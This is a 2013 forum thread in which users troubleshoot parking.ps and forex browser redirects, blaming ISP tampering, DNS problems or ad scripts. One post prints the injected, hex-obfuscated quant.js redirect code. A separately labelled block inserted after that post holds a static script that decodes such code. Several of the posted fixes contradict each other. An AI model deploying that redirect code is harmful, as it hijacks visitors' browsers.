ThaidDown Posted September 6, 2013
Could also run a superb utility which finds BHOs, called HijackThis. You do need a level of tech understanding, as its output isn't that easy to read. To make the output of HijackThis a little easier to understand, paste the output log into http://www.hijackthis.de/index.php?langselect=english; they will analyse it against their database and return results that will give a better understanding.

GrantSmith Posted September 7, 2013
Seeing as though this was affecting my iOS devices (iPad and iPhone) but not my laptop, I've reverted back to using the app on both iOS devices. This parking redirect BS is getting worse. Prior to today the simple - but still tremendously annoying - workaround was to click the URL bar, which seemed to stop the redirect and left you on the TVF page you were viewing. Now, doing this stops the redirect on the parking redirect and you then have to hit back to get back to the TVF page. #firstworldproblemsandallthatjazz

mjj Posted September 7, 2013
Grant, have you tried my suggestion? 24 hours without any problem.

rayongchelsea Posted September 7, 2013
I just changed my search engine on my iPad from Google, no problems since.

davejonesbkk (Author) Posted September 7, 2013
That 'always https' plugin for Chrome seems to be doing the job OK for me so far. For those of you scanning your computer etc. with malware programs and looking at the processes, you won't find anything, as it looks like this is happening in the connection and external to computers.

Maestro Posted September 7, 2013
At first I thought parking.ps was affecting only PCs and iMacs but now I read that hand-held devices running on Android and iOS also get infected. For such a hand-held device, would the easiest solution be to do a so-called factory reset?

Para Posted September 7, 2013
@davejonesbkk for it to be a 'connection problem' would IMO mean it was DNS related, something that is certainly possible but difficult to achieve.
@maestro been reading about the massive increase in mobile OS attacks and the shift of focus of hackers to them due to the general ignorance of security people have towards them. Samsung are releasing KNOX to try and combat this trend and it's just another reason not to root a device....

Dutchiebangkok Posted September 7, 2013
I'm also experiencing this ***ing parking.ps redirecting problem. In fact, while typing this post it has happened 4 or 5 times. Thai Visa what is going on? It has been happening on other websites too since Thursday but on Thaivisa.com it happens every minute!! It only happens on my iPhone and iPad.

SecretAgentMan Posted September 7, 2013
> I'm also experiencing this ***ing parking.ps redirecting problem. In fact, while typing this post it has happened 4 or 5 times. Thai Visa what is going on? It has been happening on other websites too since Thursday but on Thaivisa.com it happens every minute!! It only happens on my iPhone and iPad.

Delete history and cookies. It worked for me.

chuckygobyebye Posted September 7, 2013
Hi Guys,

This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop.

What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure. The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere).

We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server.

Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache.

The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur.

Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, it's your internet session that's getting hijacked.

kotsak Posted September 8, 2013
The owner of the parking.ps domain explains here what may have happened... https://discussions.apple.com/message/22912367#22912367

yankee99 Posted September 8, 2013
> Hi Guys,
>
> This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop.
>
> What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure. The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere).
>
> We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server.
>
> Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache.
>
> The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur.
>
> Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, it's your internet session that's getting hijacked.

Rubbish. My Galaxy Note was redirecting in Pattaya, Tokyo and Miami. My iPad was doing it in all the same locations. My desktop only in Pattaya.

Phil Conners Posted September 8, 2013
I think this comes from True's proxy server and is easily removed by Malwarebytes. I've never heard of cleanpcguide.com before and would stay well clear of them, might easily make matters much worse.

chuckygobyebye Posted September 8, 2013
> Rubbish. My Galaxy Note was redirecting in Pattaya, Tokyo and Miami. My iPad was doing it in all the same locations. My desktop only in Pattaya.

You're getting cache hits.

muratremix Posted September 8, 2013
> The owner of the parking.ps domain explains here what may have happened... https://discussions.apple.com/message/22912367#22912367

So he is getting free hits but he doesn't like the way his domain searched on Google. If he was sincere, at least he could disable redirects for people from India and Thailand. I'd say somebody is after quick money and True is too slow to fix things.

yankee99 Posted September 8, 2013
> I think this comes from True's proxy server and is easily removed by Malwarebytes. I've never heard of cleanpcguide.com before and would stay well clear of them, might easily make matters much worse.

> The owner of the parking.ps domain explains here what may have happened... https://discussions.apple.com/message/22912367#22912367

> So he is getting free hits but he doesn't like the way his domain searched on Google. If he was sincere, at least he could disable redirects for people from India and Thailand. I'd say somebody is after quick money and True is too slow to fix things.

I don't think it has anything to do with True as Narita airport ISP does the same thing...

yankee99 Posted September 8, 2013
> Rubbish. My Galaxy Note was redirecting in Pattaya, Tokyo and Miami. My iPad was doing it in all the same locations. My desktop only in Pattaya.

> You're getting cache hits.

I will clear my cache on all devices and see what happens.

kkerry Posted September 8, 2013
In Chrome settings under Privacy you can elect to 'Enable phishing and malware protection'. Would this be the solution after clearing your cache? I'm on True and have yet to see this parking redirect problem.

easyride Posted September 8, 2013
I find that this add-on for Firefox works. It gives a small warning by the task bar when it blocks a page. https://addons.mozilla.org/en-us/firefox/addon/blocksite/ It slows the browser down a bit but I can at least read a newspaper page without being re-directed half a dozen times. Can't find anything for IE that blocks without putting up another page that says it blocked a page.

aalek85th Posted September 8, 2013
There's a javascript file being loaded that is being modified by a 3rd party somehow. The file name is quant.js. It's loading from: http://edge.quantserve.com/quant.js

The offending code looks like:

    //<![CDATA[
    if(!fxpr) {
      var fxpr = 1;
      function __x(zz) {
        var _0xede9=["\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x34\x51\x52\x33\x48\x32\x27\x3B", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72"];
        setTimeout(_0xede9[0],Math[_0xede9[2]]((Math[_0xede9[1]]()*76543)+zz));
      }
      function vl1() { top.location = 'http://goo.gl/QBwtIl'; }
      __x(1234);
    }
    //]]>

The hex part is redirecting to http://goo.gl/4QR3H2 which is parking.ps.

If u try to open edge.quantserve.com/quant.js and get this code, hit ctrl+r, it will reload and download an original file; clearing cache should also help.

Since it is not happening on all sites, I think it's coming from some broken ad server, or quantserve.com DNS got poisoned somehow and changed to some malicious IP which had the modified version of quant.js. So it was redirecting when u visit sites that used quant.js from this server.

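Added example, not part of aalek85th's post: a static triage helper for a script body like the one quoted above, which decodes the hex-escaped string table, inlines the lookups and lists top-window redirect targets without executing anything. The function names are hypothetical, and SAMPLE is constructed from the quoted snippet.

```javascript
// Static triage of a fetched third-party script. Nothing here is eval'd.
// SAMPLE is constructed from the snippet quoted in the post above.
const SAMPLE = String.raw`if(!fxpr) { var fxpr = 1;
function __x(zz) {
var _0xede9=["\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x34\x51\x52\x33\x48\x32\x27\x3B", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72"];
setTimeout(_0xede9[0],Math[_0xede9[2]]((Math[_0xede9[1]]()*76543)+zz)); }
function vl1() { top.location = 'http://goo.gl/QBwtIl'; }
__x(1234); }`;

// Decode \xNN and \uNNNN escapes only; other escapes are left as written.
function decodeEscapes(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Rewrite every string literal as a decoded, double-quoted (JSON) literal.
// Heuristic: the output is for reading and matching, not for re-execution.
function normalizeLiterals(src) {
  return src.replace(/"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g,
    (_, dq, sq) => JSON.stringify(decodeEscapes(dq !== undefined ? dq : sq)));
}

// Find `var name = ["...", ...]` string tables and inline each name[N] lookup.
function inlineStringTables(src) {
  const tables = {};
  const decl = /(?:var|let|const)\s+([\w$]+)\s*=\s*\[([^\]]*)\]/g;
  for (const m of src.matchAll(decl)) {
    try { tables[m[1]] = JSON.parse(`[${m[2]}]`); } catch (e) { /* not a literal table */ }
  }
  let out = src;
  for (const [name, items] of Object.entries(tables)) {
    const ref = new RegExp('(?<![\\w$])' + name.replace(/[$]/g, '\\$&') + '\\[(\\d+)\\]', 'g');
    out = out.replace(ref, (whole, i) =>
      typeof items[i] === 'string' ? JSON.stringify(items[i]) : whole);
  }
  return out;
}

// Report what the script would do to the top-level window.
function triage(src) {
  const readable = inlineStringTables(normalizeLiterals(src));
  // Assignments to top/parent location, including ones hidden inside strings.
  const nav = /(?:\bwindow\.)?\b(?:top|parent)\.location(?:\.href)?\s*=\s*\\?["']([^"'\\]+)/g;
  const targets = [...new Set([...readable.matchAll(nav)].map((m) => m[1]))];
  // A timer whose first argument is a string is an eval in disguise.
  const stringTimer = /\bset(?:Timeout|Interval)\s*\(\s*"/.test(readable);
  return { readable, targets, stringTimer };
}

const report = triage(SAMPLE);
console.log(report.targets, 'string-argument timer:', report.stringTimer);
console.log(report.readable);
```

The same check can be run over a copy of the script saved from the browser cache and over a fresh download, which shows whether the cached copy is the substituted one.
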
RedCardinal Posted September 9, 2013
> Thank you, Para. The information in the link you posted looks like the best advice so far in this topic about how to remove the parking.ps redirect. Fortunately, my laptop is not infected but I checked the msconfig just the same to make sure. In Windows 7 it is as follows:
>
> Click on Start
> In the search field, type msconfig, then press Enter
> Click on Startup in the headings row
> Click on header Startup Item to sort the list alphabetically
> Scroll down the list to see if there is Parking.ps in the column Startup Item
>
> Luckily, I haven't got it, nothing starting with P.
>
> [Image: System Configuraion Startup.png]

There is no parking.ps malware. The malware is actually the fake tools being offered to "remove" it. They will infect your machine with all sorts of junk. The redirect is being caused by a JS file that is loading from the ISP. This file does not install any malware. If you're seeing the redirect do not install any tool that offers to remove parking.ps malware.

Chicog Posted September 9, 2013
Everything I've seen points to this as a browser hijack. Certainly if you are getting this in IE you could try resetting it: http://support.microsoft.com/kb/923737

beb Posted October 5, 2013
Woke up this morning to these forex redirects. Going through this and another similar thread, I see a lot of contradictory fixes. Has anybody come up with a definitive fix yet? I have adblock, https everywhere etc. installed and have cleared my cache as suggested. I haven't done certain things because others have said they are either ineffective or could be damaging. Thanks!

nellyp Posted October 5, 2013
My problem started with compare.com hijacking BBC Sport. I installed adblocker and that stopped that page. Then another site started taking over BBC. I cleared caches and installed HTTPS Everywhere. I have no idea what HTTPS Everywhere is doing but the counter it has has gone up to 4 in 10 mins. My problem is happening on 2 laptops that I use in 2 different locations, with different providers. Very annoying.

Scarecrow Posted October 6, 2013
Here's what I posted over in the forex thread.

I added these custom filters to Adblock Plus. Other ad blocking extensions might use a different syntax.

    ||chartbeat.com^
    ||quantserve.com^
    ||scorecardresearch.com^

Those seemed to do the trick for me. It's possible that Ghostery, a privacy oriented extension, might also work since it blocks some of these same scripts by default. I haven't tried this.

As for HTTPS Everywhere, it simply attempts to make your browser connect to sites via https (encrypted) instead of http (unencrypted). I'm not sure that'll help with this particular problem, but it's worthwhile to have anyway.

Lastly, to reiterate some of what's been said before, these recent redirects are most likely the result of bad third-party scripts on some of the sites you visit. This is why something as simple as an ad blocker can work; you can tell it to stop those scripts from loading. I hope this has helped.

beb Posted October 6, 2013
Well, it stopped as quickly as it started. I haven't had it happen in 24 hours and can't really say it's because of anything I did. I did add the filters to ad block as suggested just in case. Thanks

kennypowers Posted October 9, 2013
This is pretty much exactly the same as the forex redirect virus I have. Like others have said this seems to be an issue with TRUE ISP, and the more I look into it the more it seems they are covering up the problem rather than fixing it. See here for more info and fixes: http://www.thethailandlife.com/thai-internet-forex-redirect-virus